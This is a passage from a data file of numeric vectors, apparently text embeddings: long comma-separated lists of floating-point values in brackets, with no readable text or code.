0.019315444,0.012919784,-0.014760559,-0.034436326,0.0068252115,0.0178053,-0.024963308,0.02548056,-0.054838546,0.030841857,0.03306464,-0.039028157,-0.014278335,-0.0036610228,-0.02979042,0.044381596,-0.0029339208,0.000908336,-0.08712927,-0.018398171,-0.040444367,0.07371822,-0.016734092,0.05303659,-0.009286782,-0.017397331,-0.010083368,-0.009527117,0.035858985,-0.052195065,0.060927823,-0.038376745,-0.037459005,-0.09196548,0.016104765,-0.021545218,0.05421077,0.017267916,0.05228927,0.09021304,0.017496694,-0.011382865,0.012971777,0.010626303,-0.000430297,0.021475846,0.039084785,0.04133466,0.026166132,0.080837846,0.059860155,0.032779276,-0.009702032,0.025351858,-0.008026767,0.034159113,-0.013909179,-0.052091606,-0.045110542,-0.03807603,-0.017009836,-0.032586824,-0.0388367,0.02139371,-0.02546561,-0.000072653726,0.035635497,-0.041581158,-0.047068592,0.008858483,0.024237707,0.0138561595,-0.032066345,0.0043371855,-0.01890342,0.050805926,0.03633869,-0.012456053,-0.0025046617,0.0072672255,-0.014821159,0.047300905,-0.003867094,-0.0056874314,-0.010538663,0.0134459175,-0.026959723,-0.043789387,-0.0070685884,-0.022971872,-0.0024638546,0.0337132,-0.035149306,0.022511346,0.007742766,-0.009118739,-0.018067295,-0.08396541,0.053984247,-0.013381927,0.025546687,0.048379324,0.019919004,0.023359278,0.013033234,-0.04608211,-0.0013986414,-0.019891951,-0.02571006,-0.038224645,0.020589383,-0.0062809233,0.08521238,-0.012582267,0.05004598,0.0020088528,0.012614899,0.027939646,0.012835151,0.026524179,0.012872348,-0.056500982,-0.009214081,0.020058481,-0.00021057799,0.014813251,0.016625449,0.012621436,-0.0029078107,0.018561043,-0.01095591,-0.06298759,0.041168597,-0.0013952001,-0.026178041,-0.050943457,-0.0047348896,-0.033212584,-0.025423616,-0.0052095815,-0.01708371,-0.06898523,0.0057125115,0.025496863,-0.018727398,-0.022057097,0.032648023,-0.006152628,-0.011759462,0.061911535,0.015210012,-0.0040084184,0.08820007,-0.02277104,-0.021597048,-0.00026503572,0.019614935,0.07214963,0.048808325,0.009936693,-0.025736079,0.0007958612,0.008916174,-0.02556212,-0.079241544,-0.033899985,-0.039195832],[0.015021051,0.03594335,-0.17341127,-0.0015154672,0.080124736,-0.06836936,-0.030635808,0.04124269,0.0016958071,-0.016457278,-0.020725388,0.11230768,0.031186119,-0.02822162,-0.023134395,-0.01940778,0.027463747,-0.034796353,-0.023181085,-0.020889973,0.00682269,-0.053342465,-0.01757395,-0.04715362,0.08423876,0.004294115,0.00030819516,0.0064120656,0.002234572,0.035240505,0.03508221,-0.0415072,0.011632301,-0.013452264,-0.038507964,-0.04647429,0.01648879,0.033905003,0.009031803,-0.023793029,-0.005581073,0.010026014,0.018117446,-0.045199625,-0.009776495,0.023832599,0.010308919,0.06345796,0.040390067,-0.11238186,-0.009659739,-0.084389985,-0.002990058,-0.026229363,0.06986555,0.024057407,0.034772605,0.049406677,0.010884577,-0.0568755,0.041764423,0.010947495,-0.0059195417,0.089083135,0.0258549,-0.010772609,-0.043963514,0.059125185,0.017095437,0.006637186,0.06347916,-0.00386408,-0.017440122,-0.03616355,-0.025306636,-0.031527005,-0.049259625,-0.101503745,0.021050775,0.020468554,0.021652047,-0.047834724,0.075037666,-0.021787828,0.02071267,-0.031923696,-0.0127493795,-0.029694919,-0.05375027,0.015887054,0.015677404,-0.020428872,0.00522071,0.10916556,-0.09446248,-0.012107004,-0.0131286485,0.031588037,-0.029182674,0.0024154396,0.010802851,0.004256434,0.016459296,-0.0063714464,-0.003048467,0.035939336,0.0021343792,0.034910157,0.053899918,0.02248991,0.013975165,0.0043866006,0.0391891,0.029237024,0.019569827,-0.053566903,0.025083916,-0.042592544,0.016772918,0.028787246,0.02180675,-0.044160876,-0.031982213,0.045507602,-0.008115834,0.027211722,-0.042260636,0.0278567,-0.003094002,-0.059480235,0.002657715,-0.0037375046,-0.021263776,0.018436465,0.040146098,-0.014804762,-0.024749974,-0.0360974,0.025023937,-0.02120567,-0.01313578,0.05516444,0.0065498725,-0.051411886,0.02130494,-0.058286935,0.030316008,-0.04039548,-0.04846961,0.035421636,-0.0137763405,0.022563215,0.020116942,0.038403228,0.015957212,-0.022597848,0.008065708,-0.019434344,0.002404229,0.096671596,0.01851903,0.036219776,-0.04187062,0.018584324,-0.010436729,-0.06489595,0.0554474,0.08916105,-0.00019459575,0.0028422582,-0.017922072,-0.026966175,-0.030946862,-0.021993082,0.0112015065,0.024282433,0.013088824,-0.04941477,0.020597495,-0.018568724,0.032332044,-0.0691832,0.06426548,0.05460741,-0.0022241764,-0.0043414235,0.033975698,-0.07796989,0.018598253,-0.023202777,0.021412382,-0.008654793,-0.040530935,0.003752193,-0.007689316,-0.063457295,0.05380736,-0.003445345,0.040605508,-0.0037303215,-0.028721817,0.031837706,-0.00988395,0.0021747286,-0.020889282,0.03526444,-0.006046867,-0.004630806,-0.039743766,0.043980844,0.062543094,-0.019841557,-0.001353305,-0.08086284,0.0078981975,-0.017401809,-0.004935127,-0.043801654,-0.027878596,0.007272207,0.022023678,0.015768275,0.012587637,-0.048366625,0.02134414,0.019491926,-0.015508704,0.01896113,-0.00019069544,-0.008919835,-0.03422875,-0.08456806,0.061090015,0.011423484,-0.053812813,0.01662623,0.009537692,0.05623097,-0.019621782,0.04410958,0.03559407,0.05450805,-0.00945649,0.035141688,-0.007327814,0.031181144,-0.032866724,-0.08410738,-0.020298349,0.01805121,0.010293247,-0.011973688,0.020907667,-0.006942682,0.04568563,-0.08459184,-0.013479393,-0.01746637,0.017603112,-0.017166425,0.006442168,0.013337182,0.021501776,0.0048099346,-0.027908636,-0.09328662,-0.010928009,0.06063796,0.007594594,-0.0071934545,-0.022070345,0.045478303,0.06266051,0.07132492,0.013611302,-0.015680902,0.034489233,-0.0024015955,-0.053800385,0.035488527,-0.09255454,0.013909039,0.0070188683,-0.027050393,0.018093592,-0.048951756,0.042518456,-0.02262621,0.006003343,-0.008094624,0.043436978,-0.05398022,-0.036950223,0.06944742,-0.044643555,-0.017377736,0.07332037,0.015879674,0.014616688,-0.031323306,0.0373628,0.03929119,-0.028271971,0.03694725,0.002207092,0.0052994816,0.020586977,0.011562106,-0.015847702,0.020696739,-0.031087836,-0.021515857,-0.0046725045,0.03307064,-0.021128824,0.023260977,-0.016852697,0.0067362576,0.0105601745,-0.030861152,-0.018066287,-0.015487331,0.009873835,0.00059871527,-0.044450592,-0.005494918,-0.070719555,0.024794588,-0.048575982,-0.036996033,0.019612422,0.040443208,0.012347594,-0.029373653,-0.043143097,0.016419927,0.013424922,0.017258389,0.0074254186,0.014777601,0.02441974,-0.03999959,0.008106286,-0.050114788,-0.0060679214,0.026595274,-0.041956674,0.0000588029,0.074143045,0.055378888,-0.041530963,0.024066972,-0.028572438,0.0010817565,0.019996956,-0.021813132,0.05212976,-0.0027331936,0.02707793,0.00047281923,0.039107725,0.018036393,0.020512737,-0.021506894,0.0130758425,0.031753596,0.03372959,-0.014290419,0.008258089,0.046828095,-0.0049228827,-0.032511383,0.017149057,0.02909076,-0.01701778,0.03615242,-0.054346442,0.003790027,-0.02449328,0.010055596,0.0039765667,-0.06315393,-0.0063693854,0.014111788,0.0065130363,0.0057144184,0.03770259,0.017218808,0.016961183,0.040509246,0.035631966,-0.024674596,-0.024565896,0.08618774,0.020103859,-0.00032393407,-0.020663321,-0.024316795,-0.012494173,-0.008168509,-0.041072745,-0.03031399,0.0046616113,0.01894248,-0.017132562,-0.0013262748,-0.013322866,-0.009928785,0.07752973,-0.0073172967,0.04875997,0.0053584506,-0.04168015,-0.053191867,0.010572455,-0.004770775,0.06662995,0.024091024,-0.013596738,-0.01672435,-0.02652308,0.004105264,0.02284732,-0.0067156646,-0.011556225,-0.008447246,0.017814629,0.024843685,0.016091939,-0.09284897,-0.013001799,0.029998662,0.043001354,-0.008798489,0.005499008,-0.051600892,-0.0009740223,0.008176654,-0.023268435,0.012920407,0.047252633,-0.0093971165,-0.04243335,-0.01450787,0.028725516,0.07710419,0.10232323,-0.037982725,-0.027638247,0.017427059,-0.027644211,-0.0145921325,0.032030493,0.04546951,0.09565181,0.012041561,0.022072352,0.0070156115,0.0066278493,0.0096226055,-0.014192852,0.016814198,-0.058617,0.019012418,-0.016676009,0.038337696,-0.010536542,-0.050740264,0.050725717,0.10113038,-0.019375935,0.0022925988,0.042288065,-0.012135226,0.042966012,0.009869712,-0.0039198175,0.016747223,0.0026971442,0.08560183,-0.028034922,-0.043225873,-0.034882173,-0.061709948,-0.016972113,0.044138834,-0.000010790218,0.005463719,0.0025298211,0.01119814,0.011030508,0.063152865,-0.010027085,0.0037069242,0.0154511295,-0.038111046,-0.0009452071,0.027447408,-0.014586358,0.014955259,0.02951331,0.0011070137,-0.034691744,0.05680739,0.036946565,-0.06498775,0.044374052,-0.04851672,-0.023246739,-0.04823894,-0.010858275,-0.016190665,0.040319055,0.0074963504,0.058988184,-0.049310554,0.001125702,-0.022101996,-0.056049876,0.018986074,0.02441416,0.009622107,-0.042288598,-0.008657937,-0.021385785,0.009652603,0.011912355,-0.03495733,0.03563886,0.024939409,0.012522088,0.0032160846,-0.07071704,-0.0013974346,0.01831013,-0.024799442,-0.033443127,0.0458386,-0.007911031,0.008379112,0.03197703,-0.01555526,0.022946032,-0.022599608,-0.01653319,-0.043107506,0.005826599,0.05680809,0.006955094,-0.031803265,0.023308106,-0.053708725,0.024278179,-0.04661233,0.053884473,-0.0035319536,0.019209778,-0.017236004,-0.029302549,-0.034652337,-0.025575886,-0.0073974766,0.04818196,0.011654134,-0.026995357,-0.025950523,-0.036843654,-0.0055358587,0.0023357782,0.026626855,-0.048599053,-0.049463637,0.0044951937,-0.05451227,-0.018917097,0.06740285,0.020523977,0.0041989316,-0.04497364,-0.0028204727,0.04408516,-0.025673892,0.02123873,0.04596616,0.012258099,-0.012201815,-0.04589506,-0.037459422,0.06363388,-0.02609226,-0.03616332,-0.00626493,0.0112664625,0.041949064,-0.019394932,0.06141496,-0.023865594,0.0034909744,-0.02883859,-0.034558292,-0.029802002,0.016955324,0.019510899,-0.014468845,-0.020323891,0.08224282,0.023116142,-0.01836432,-0.03884962,0.01722319,0.034698565,0.013974931,0.015799442,-0.0025361774,0.023079852,-0.06781355,-0.0020740787,-0.009972746,0.014897399,-0.03770198,-0.04072406,-0.028068021,-0.004816489,-0.032118935,0.0143185025,-0.048480194,0.019616652,-0.074928075,-0.041634966,0.025855891,-0.036716644,0.035693806,-0.044651903,-0.05929465,-0.07976515,0.044059474,0.004098766,0.034109823,-0.07999154,0.06024517,0.062038258,0.0053799516,-0.010887945,0.0025721805,-0.014386162,-0.0036856194,0.011412693,0.047758315,0.07859735,0.026889674,0.07741715,0.026086692,0.020963812,-0.00816756,0.04383548,-0.038439494,0.032419328,-0.016328208,-0.060777597,-0.03986737,0.0043784515,-0.0065956367,-0.011545019,-0.046732724,0.040749308,-0.006186404,0.01695582,0.0012276175,-0.01840489,-0.04003454,-0.003529273,0.05487027,0.0057920753,-0.038698297,0.020283816,-0.013829696,0.07711446,0.045031197,0.009989736,-0.010554131,0.004543197,0.0029302007,0.037586052,-0.005728022,0.024180364,-0.03348328,0.031688634,0.018066086,-0.03704675,-0.02337253,-0.010925357,-0.048203122,0.01405816,-0.024705375,-0.026523083,0.042006347,-0.02722622,-0.035027888,-0.057627924,0.04923588,-0.016131623,0.03718414,0.039444905,0.051247384,-0.001747288,-0.013282359,0.036305603,0.007974695,0.0049499203,-0.03454349,0.0034252524,-0.011869965,-0.05396916,0.02535281,-0.015896076,0.012893412,0.015240533,-0.028700784,0.012176439,0.019931199,0.050302684,0.016622989,-0.03290245,-0.011021345,-0.018390883,0.0021942055,0.015905531,-0.022245333,0.00900999,0.014071052,-0.0075626383,-0.038348194,-0.03176345,0.061931986,0.0067810984,-0.023626985,-0.039931692,-0.012753896,-0.059266947,-0.04178079,-0.02820583,0.020229707,-0.042161047,0.012285523,0.017366488,-0.01950045,-0.020586869,0.032567278,-0.014496721,-0.000438727,0.06410806,-0.017468171,-0.025368763,0.031880885,-0.0151487505,-0.026475387,0.0016538313,0.062328164,0.1137984,0.025419837,-0.0025940537,-0.06566688,-0.0054462347,0.0044717924,0.009739547,-0.069829516,-0.026804186,-0.036651745],[0.012506608,0.002876199,-0.17179038,-0.044137448,0.07038066,-0.06634871,0.045234602,0.03614337,0.0042029354,-0.04372453,-0.012313155,0.06840058,0.04458263,0.00015874421,-0.021126587,-0.053836793,0.0021147428,-0.041464392,-0.05432976,0.0020932918,-0.006515619,-0.054492112,-0.014293933,-0.0603072,0.078494705,0.022023313,0.038129937,0.009356779,-0.03928786,0.016471764,0.022602642,-0.054097142,-0.03449202,-0.0052728043,-0.0754569,-0.01644209,0.010604529,0.04104448,-0.017772138,0.0020966805,0.0052306266,-0.008502115,-0.008532989,-0.028808815,-0.0073954905,0.01940419,0.03731264,0.02987587,0.082530774,-0.07937674,-0.023408817,-0.024665112,0.06322949,-0.010970878,0.08740301,0.02464885,-0.0036315597,0.024246702,-0.014877007,-0.06435424,0.062149864,0.03607147,-0.033959806,0.073079444,0.049732167,-0.020870836,-0.04573966,0.036685042,0.041539785,-0.0060208784,0.064316,-0.014046552,-0.0148656955,0.017600145,-0.028653849,-0.011793747,-0.02953025,-0.064170785,0.016064215,0.053580496,0.027534466,-0.013425675,0.08421152,0.017641092,0.03212519,0.00625432,0.00018780502,-0.041426174,-0.04128743,0.018099248,0.024658203,-0.0027979568,-0.011514574,0.06282063,-0.071034476,-0.017594159,0.020244714,0.007769808,-0.0343801,0.021228772,-0.011778008,0.0003718295,0.004975558,0.007195626,-0.011536825,0.041074183,-0.017156916,0.04299969,0.010985142,0.022288192,0.021473909,0.023814017,0.018378383,0.04992361,0.029466564,-0.02718215,0.023445463,-0.055904627,0.011039797,0.041775227,0.018746775,-0.020810708,-0.031790596,0.020057322,0.036084782,0.04496433,-0.017739253,0.048180398,0.0027018872,-0.060971405,-0.019678464,0.021016179,-0.02839898,-0.00953612,0.026083617,0.069165945,-0.054645926,-0.029067408,-0.0317414,-0.02283697,-0.01082078,0.02667237,0.0083838245,-0.019374503,0.004677987,-0.026368557,0.017005853,-0.032098632,-0.05125126,0.043063074,-0.02883876,0.022956189,-0.013382893,-0.0106321005,0.034049805,-0.010365516,-0.017362067,-0.011145136,-0.0069316057,0.07151244,0.005097461,0.0106487395,-0.037566565,0.038031608,-0.026957216,-0.06324638,0.022179147,0.07408077,0.033104107,-0.015815808,-0.027389493,-0.029757176,-0.022237115,-0.039078873,-0.0049473816,0.050389856,0.03829401,-0.007699501,0.026105383,-0.011082946,0.036884803,-0.029255299,0.060358446,0.006221952,-0.035196654,-0.00782254,0.031601515,-0.024600497,0.0063781007,-0.027958326,0.023947531,-0.008466653,-0.06337435,0.009784533,-0.013879063,-0.06716185,0.03289715,0.0009863726,0.005058269,-0.010775669,-0.054338776,0.0042522107,-0.013586902,0.0049473266,-0.051349614,0.034924768,-0.023817405,0.012833031,-0.023027547,0.04967673,0.04596964,-0.035428002,-0.024980512,-0.026391698,0.02495355,0.0015080044,0.007100889,-0.039607566,-0.026061235,-0.004324204,0.029727235,-0.016501589,0.028216776,-0.048673652,0.052606218,0.0027054506,-0.056316167,0.0081555825,0.034324605,-0.023869438,-0.045567326,-0.08319607,0.0637894,0.026454985,-0.042763237,-0.0063032066,0.00076731254,0.071190506,-0.04998189,0.015415906,0.038575865,0.038661927,-0.0028993606,0.04155225,-0.051715124,0.014155333,-0.036908723,-0.03259037,0.0021837354,0.054108735,0.0038794682,0.020163745,-0.0077971867,0.0094859665,0.04708109,-0.06890745,-0.009006604,0.0037049418,0.01221977,-0.027614253,0.017315945,-0.017916333,0.011954228,-0.028068839,0.021468826,-0.06575891,-0.038579967,0.030716468,-0.0028007305,-0.0011571333,-0.001732537,0.025302852,0.059248995,0.055445466,0.01836562,-0.022110736,0.04132231,0.014951529,-0.016054261,-0.019862678,-0.08107507,0.03329811,0.007474961,0.0000916891,0.008857282,-0.027208997,0.033688158,-0.012837466,0.041587748,-0.020174375,0.04170854,-0.05067495,-0.016278293,0.021212945,-0.03518791,-0.010068638,0.051687054,-0.017354986,0.028104471,-0.042710647,0.033233155,0.05448208,0.021939829,0.011630829,-0.01873955,0.041296124,0.006710005,0.0063778474,0.023776872,-0.015740486,-0.055201065,0.02195306,-0.0021381206,0.028616074,-0.071665674,0.06367666,0.024371257,0.0043615825,0.008158344,-0.028274806,-0.0018084041,-0.041316114,0.0025274155,-0.0012005352,-0.06010916,0.0074692727,-0.027685251,0.060504112,-0.05716814,-0.0010032589,-0.021967512,0.011835109,0.026675373,-0.034538925,0.0007191362,0.037724055,-0.0056624333,-0.00048586377,-0.012003157,0.015046724,0.010495365,-0.027259598,0.012048955,-0.038787626,0.0045221318,0.03457102,-0.061081246,0.007243642,0.026280267,0.009036587,-0.03710295,0.04065165,-0.035712775,-0.030569738,0.023885572,-0.026531031,0.038947236,0.01895307,0.016671538,0.010939735,0.073078066,0.03689974,0.03242818,0.032528434,-0.0155611755,0.046269063,0.044942144,0.031912673,-0.0065150685,0.020621834,0.014709711,-0.010558208,0.023325665,0.053065136,-0.021678202,0.050972983,-0.056603834,-0.007114971,-0.031452984,0.037125945,-0.020277236,-0.056137584,0.028401194,0.040685877,0.004808905,-0.004207269,0.035630386,-0.0072329403,-0.006650378,0.055590805,-0.012068187,-0.0421753,-0.05347843,0.040050123,0.0071129818,-0.012416876,0.041303605,0.00019218576,-0.010226926,0.042735673,-0.04240087,-0.046160996,0.025997076,0.008177535,-0.030424604,-0.003994006,-0.039456125,-0.040467314,0.075422004,-0.0050122715,0.03139147,0.012976846,0.008270937,-0.057137772,0.020880323,-0.0033886465,0.0896658,0.0011786178,-0.0037928869,-0.0009575693,-0.0047402363,-0.02301969,0.016755996,-0.03675518,0.003451183,0.022324072,0.023692347,0.069181174,0.026618717,-0.03866748,-0.00024372363,0.043508947,0.0075129536,-0.02710194,-0.015390461,-0.04285103,0.038703907,0.01762774,0.008675972,0.0060856803,0.008818435,-0.01857728,-0.03637484,-0.03150863,0.03943728,0.07452207,0.07231782,-0.05491666,-0.062023893,0.041712657,-0.01578357,-0.0025910325,0.04146409,0.024693085,0.097980335,-0.017105155,0.043949716,-0.021302726,0.046235017,0.065557234,0.019096144,0.036119454,-0.052850872,-0.012447296,-0.006593532,0.03154024,0.0016498117,-0.022802733,0.045844972,0.07577264,-0.06610083,-0.020558804,0.053689227,-0.043184463,0.028256323,0.022989986,-0.0106079,0.010840025,-0.03674128,0.05770373,0.0018417714,-0.04581357,-0.048051946,-0.08277395,-0.01930152,0.04277264,0.00009332123,-0.03774312,-0.0010536183,-0.0022832474,0.01797621,0.018317984,-0.0013791405,0.0015208767,-0.015054972,-0.03517836,-0.004181611,0.0572859,0.005998331,-0.028567774,0.06255003,0.048484303,-0.021590263,0.012322753,0.051621057,-0.033839297,0.017741596,-0.069028765,-0.035050992,-0.031214722,0.0001732973,-0.043478154,0.036384914,0.018015297,0.0457384,-0.055732347,0.0034206659,0.0026936277,-0.067103826,-0.012310737,0.007099312,-0.012881854,-0.032522447,-0.03447049,-0.022502223,-0.01650375,-0.011880156,-0.03890972,0.048158254,-0.005007576,0.034577712,0.006694406,-0.06598615,-0.012730672,0.021651924,-0.009395492,-0.018375106,0.016122421,-0.03768823,0.04724864,0.03249001,-0.00081863935,0.04123711,-0.013309855,-0.020484427,-0.04269799,0.017934756,0.053418636,-0.023220992,-0.038049135,0.044015087,-0.068594955,0.015397181,-0.035946254,0.047652222,-0.024335565,-0.01109122,0.014706905,-0.02152056,-0.05474268,-0.045985978,-0.007313406,0.010790039,0.010936367,-0.0006541871,-0.07546028,-0.054524884,0.03588066,0.019263707,0.036797952,-0.010607408,-0.033865772,-0.021672033,-0.026495727,-0.02573937,0.028715596,0.043813605,0.019443834,-0.021282172,-0.041110873,0.034638982,-0.047688875,0.036467087,0.054782864,-0.023799,0.022863908,-0.018624531,-0.04501645,0.024746351,-0.01851346,-0.02066495,0.024685994,0.031438604,0.013907941,0.012016007,0.037650663,-0.02401661,-0.014493686,-0.017630618,-0.047319993,-0.02381865,0.027699554,0.008974902,-0.03261473,-0.008007664,0.08239385,-0.00096302916,0.010457094,-0.02014493,-0.009613611,0.029175172,0.030891055,0.025694622,0.018849215,0.051157054,-0.060469456,0.039048932,0.0010121337,-0.030607263,-0.058510933,-0.02023245,-0.05406049,0.035532914,-0.03004701,0.045906793,-0.010442974,0.010415616,-0.055082917,-0.045916587,0.041969206,-0.045933284,0.07442759,-0.056637876,-0.0795419,-0.1151996,0.015616277,0.029469877,0.01418823,-0.0062208544,0.018862871,0.026074132,-0.021887584,-0.02371849,0.00853949,0.032146018,-0.047421135,0.006516901,0.07173867,0.08176919,0.027801797,0.083746895,0.03891822,0.020157382,-0.047325816,0.014918872,-0.0033003802,0.042552542,-0.026940225,-0.02342637,-0.02277369,-0.047683105,-0.0010385467,-0.012804835,-0.06342201,0.040432937,-0.02855364,0.015406185,0.019419957,-0.050077584,-0.072887555,0.024850415,0.028361674,-0.0052833282,-0.02915727,-0.018949958,-0.010361412,0.06574413,0.048677765,-0.05467771,-0.03315463,0.027588582,-0.02111995,0.056989867,-0.045724098,0.02303803,-0.033959422,0.036497336,-0.0020172177,-0.010624073,-0.015512719,-0.035474204,-0.028128862,0.027930643,-0.042661622,-0.028356705,0.04457573,0.009224168,-0.017062316,-0.05444894,0.04689963,-0.056587346,0.018484658,0.027105523,0.025294043,0.0054614954,-0.018332977,0.014322206,0.0015591158,-0.026752008,-0.061558176,-0.039313573,0.013370188,-0.02658499,0.057889305,-0.018689187,0.032308947,0.015136001,-0.02176651,0.032492053,0.040207125,0.031861078,-0.022890447,-0.051251214,0.00049104355,-0.015438239,0.0059821894,0.01809237,0.010576226,0.034496278,-0.012563519,-0.007275425,-0.0051955017,-0.050076988,0.029752772,0.019858627,-0.026658338,-0.020240847,-0.015138512,-0.04980038,-0.02510221,-0.032287225,0.05584796,-0.013851078,0.027234396,0.013337728,0.026472403,0.009175685,0.04960009,-0.006055696,-0.055876438,0.05644028,-0.018502006,0.008393658,0.0453597,-0.026801465,0.02704549,-0.019559398,0.033748787,0.11869698,0.009943188,0.011202201,-0.04390885,-0.024048997,0.0036976363,-0.023679648,-0.052914362,-0.012535002,-0.0111925835],[-0.005014544,0.06267188,-0.18883206,-0.0064101396,0.08230887,-0.056462437,-0.028715573,0.033898763,0.022964384,-0.028590057,-0.06008822,0.0733098,0.044683997,-0.022044849,-0.029993812,-0.039835025,0.060423978,0.0101804435,-0.04478721,0.011064828,-0.0031121974,-0.05816973,-0.029011805,-0.04422185,0.08389113,0.011598622,0.007104712,0.019369379,-0.0207983,0.040128198,0.034552712,-0.021027394,-0.03198012,-0.030263562,-0.061587654,-0.014181891,0.025351238,-0.011185059,-0.048694108,-0.03534716,0.027332744,0.03552699,0.029718747,-0.027658574,-0.020181924,0.008518847,0.06851956,0.0659374,0.032343127,-0.08928859,0.0032537591,-0.04334126,0.033703137,-0.036617756,0.084308326,0.00864783,0.020402465,-0.050457086,0.024023717,-0.0402837,0.07609544,0.058664095,-0.029044053,0.07783718,0.050094843,-0.02827758,-0.03869154,0.05530839,0.015010034,-0.0033599793,0.021123745,0.014834161,-0.03457695,-0.021325236,-0.018995391,-0.0088327285,-0.05651485,-0.029577075,0.04196559,0.04270072,0.008358175,-0.048133917,0.049018294,-0.032721635,0.037288774,-0.054107945,-0.0068656905,-0.0020216121,-0.012543339,0.027856711,-0.023872191,-0.026016744,0.046428274,0.055280857,-0.09714467,-0.0033997279,0.0047779623,0.006223632,-0.044038273,-0.0017278218,0.012242934,0.005399794,-0.0014910512,-0.009595884,0.01706455,0.023142919,0.014351955,0.047277596,0.04748967,0.027419534,0.009530918,0.047563158,0.014552138,0.017973084,-0.011947678,-0.017741214,0.011339143,0.0006147779,0.009895447,0.01552803,0.023772776,-0.059044786,-0.034060325,0.053694017,0.022064224,0.015066839,-0.048076253,0.049166854,-0.026029767,-0.06898086,-0.042179972,-0.0082602175,-0.030690772,0.006715129,0.01802558,0.009034384,-0.014492845,-0.054012563,0.015112504,0.009926629,0.059978902,0.038047276,-0.0097706895,-0.035927474,0.023579106,-0.050498743,-0.008940735,-0.029775277,-0.05043652,0.028319074,-0.02362419,0.03931252,0.004240853,0.018649215,0.029977392,-0.025494287,0.012222744,0.02554699,0.0006258468,0.07740459,0.02646976,0.041253872,-0.025642151,0.040039457,-0.001803018,-0.03601373,0.040011775,0.09182021,-0.0102639375,0.047670234,-0.020225298,0.003668285,-0.012139569,0.012314912,0.0032028905,0.035207644,0.0019493103,-0.020407233,0.06475044,-0.05535751,0.031054305,-0.08851251,0.074862644,0.018749928,-0.03577125,-0.010846087,0.010706716,-0.033837087,0.023041895,-0.04857722,0.019143712,-0.027373986,-0.041965205,0.0029111693,0.026427496,-0.005057837,0.057680447,0.0052288184,0.0052533806,0.0047421902,-0.042429894,0.0132524,-0.04533676,-0.0029531517,-0.039835446,0.040590927,-0.0046235914,0.0010250194,-0.0051111546,0.00529054,0.053316806,-0.02876084,-0.0018476718,-0.021051258,-0.010849927,-0.014220347,0.0029690333,-0.05665155,-0.021784252,0.017894298,0.018546352,-0.019407354,0.022990149,-0.019194432,0.031120978,-0.0018658363,-0.005207778,-0.018738743,0.0051691816,-0.010182595,-0.037907798,-0.050168622,0.06541519,0.0058962954,-0.046443842,0.037122376,-0.007135953,0.045238487,-0.0152254,0.004991803,0.01989258,0.027325597,-0.011631544,0.031756077,-0.037455577,0.0068988046,-0.05105032,-0.046926964,-0.011125188,0.029905489,-0.032211546,0.004818856,0.03725226,-0.017105637,0.033880416,-0.048625603,-0.014745704,0.0032148482,0.00029390835,-0.0030547658,0.0068517313,0.041889478,-0.004422739,-0.021215456,-0.046421383,-0.07959589,-0.021221934,0.030325737,-0.015527331,-0.0031076649,-0.014101644,0.062192183,0.055736586,0.07917555,0.00035037793,-0.0012350972,0.023686232,-0.008680172,-0.007977737,0.02846549,-0.080714874,-0.017010048,-0.017747799,0.015561216,-0.012517441,-0.024792707,0.022110574,0.013319579,-0.0154378,-0.040419053,0.054465845,-0.025842309,-0.042924263,0.046215273,-0.0075348252,-0.04547084,0.05394962,-0.033078898,0.00026419898,-0.006467504,0.036038134,0.021786558,0.011116647,0.04619238,-0.036597915,0.008178144,0.07636572,-0.008100536,0.0013100292,-0.00903035,-0.023151524,-0.010293601,-0.022534901,0.015572436,0.013225697,0.029216858,0.02649409,0.030480526,0.0010084751,-0.0046144472,-0.005351694,-0.012567088,0.013567021,-0.051212505,-0.021032522,0.010772774,-0.0673224,0.03607651,-0.049336456,-0.03956733,0.002103262,0.036452666,0.018388731,-0.08784224,-0.029120266,0.021044891,0.026380518,0.021592034,-0.010988879,0.027843656,0.021361774,-0.037989404,-0.030778145,-0.058913853,-0.0024160095,0.022528065,-0.06417308,-0.027135598,0.09030199,0.026880732,-0.04253408,0.029750638,-0.004554944,-0.008352372,0.030212888,-0.026024764,0.011836015,0.016215336,0.003608553,0.018761463,0.045523535,0.034014,0.006026146,0.008225846,0.020088451,0.06324593,0.032999717,-0.018488906,0.018577017,0.009361873,0.0045603877,-0.05208926,0.040874004,0.013361227,0.0070525277,0.01926106,-0.10145393,-0.025450109,0.021481063,0.015777716,0.046781067,-0.037048187,-0.0055594784,0.016655585,0.02859417,-0.016305987,0.043204576,-0.016025256,0.035278056,0.049908683,-0.008339172,-0.017003577,-0.032381874,0.023981418,0.04802028,-0.05672341,0.00045233723,-0.044791862,-0.005163046,0.020641379,-0.030704118,-0.040911935,-0.007125254,-0.008625635,-0.023228334,0.025358792,-0.037874795,-0.023587234,0.095842175,-0.0061936895,0.041580264,-0.03904578,-0.048156448,-0.053111613,0.030909704,-0.00087152317,0.052832596,0.024386952,-0.004260274,-0.07324727,0.02263381,0.0101342825,0.036048394,-0.0059784506,-0.014643015,0.0032157388,0.022702517,0.037750565,0.025829064,-0.10258188,0.024702657,0.055094764,0.032619268,0.012334898,-0.012670721,-0.0035071538,0.01710762,0.0006839856,0.02100595,0.051526614,0.03642092,0.00072371087,-0.024634693,-0.02706224,0.040175438,0.058466453,0.09165005,-0.031196838,-0.026164426,0.03807362,-0.02144249,-0.032886896,0.045513075,-0.015568762,0.11557341,0.00016435978,0.032885447,-0.011868799,0.023251278,0.012213191,-0.018757826,0.023912307,-0.046954487,0.025577934,0.023435716,0.019467603,0.035541177,-0.020614494,0.05507344,0.07244096,-0.026552835,0.005100946,0.009798316,-0.031013066,0.04959243,-0.0030750984,-0.020540193,0.021748476,-0.03377867,0.07533414,0.032524865,-0.03623772,-0.01740706,-0.04937535,-0.02173737,0.03869341,0.05348263,-0.026806535,-0.002917324,-0.018442648,-0.033341482,0.029779544,-0.011015274,-0.007698942,0.0043928414,-0.036169063,-0.02123743,0.024570614,0.007965406,0.015308581,0.046358224,0.028125884,-0.018832436,0.035668593,0.008785426,-0.046571784,0.04774855,-0.059479084,0.020643245,-0.032366615,-0.040755007,0.0017966435,0.04128946,0.008230565,0.033351894,-0.020764679,-0.013685325,-0.004343882,-0.015708061,-0.0022263296,0.044278737,-0.018869514,-0.035307743,-0.009553556,-0.06713548,0.0048792264,-0.0007229833,-0.03372604,0.0046270373,-0.024042018,-0.011989295,-0.0063835564,-0.08293252,-0.02547808,0.028216023,0.020721951,-0.0052366788,0.033787172,-0.0067299344,0.020488879,0.021172272,-0.019296318,0.013394933,-0.03830606,0.0012090717,-0.058228835,0.003844232,0.022719782,-0.0034307109,-0.040148735,0.0027191963,-0.045078617,0.011071878,-0.035448063,0.05107338,-0.014770939,-0.0050271284,0.006757458,-0.06952241,-0.029904434,0.013062374,0.0023816468,0.06593253,0.01223567